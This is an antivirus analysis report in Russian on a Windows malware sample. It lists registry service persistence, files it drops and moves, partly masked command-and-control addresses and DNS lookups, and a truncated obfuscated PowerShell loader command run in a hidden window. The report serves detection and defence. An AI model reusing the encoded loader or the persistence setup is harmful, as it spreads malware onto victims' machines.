Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\xpsrchvw] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\xpsrchvw] 'ImagePath' = '"%WINDIR%\SysWOW64\ir50_qcx\xpsrchvw.exe"'
Создает следующие сервисы
- 'xpsrchvw' "%WINDIR%\SysWOW64\ir50_qcx\xpsrchvw.exe"
- 'xpsrchvw' %WINDIR%\SysWOW64\ir50_qcx\xpsrchvw.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAF...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\870.exe
Удаляет следующие файлы
- %HOMEPATH%\870.exe
Перемещает следующие файлы
- %HOMEPATH%\870.exe в %WINDIR%\syswow64\ir50_qcx\xpsrchvw.exe
Подменяет следующие файлы
- %HOMEPATH%\870.exe
Сетевая активность
Подключается к
- '10#.#17.53.230':443
- '21#.#1.142.238':8080
TCP
Запросы HTTP GET
- http://ma###.hoonicorns.pt/comp3/ly8cmti/
Запросы HTTP POST
- http://21#.##.142.238:8080/7DdRk8EbiX7dN6/jMV6IeOeAM5XUe/hBR6GXTA/ via 21#.#1.142.238
UDP
- DNS ASK 20###607.com
- DNS ASK lo####-lollies.com
- DNS ASK an##ge.com
- DNS ASK co####t-plus.co.uk
- DNS ASK ma###.hoonicorns.pt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAF...' (со скрытым окном)
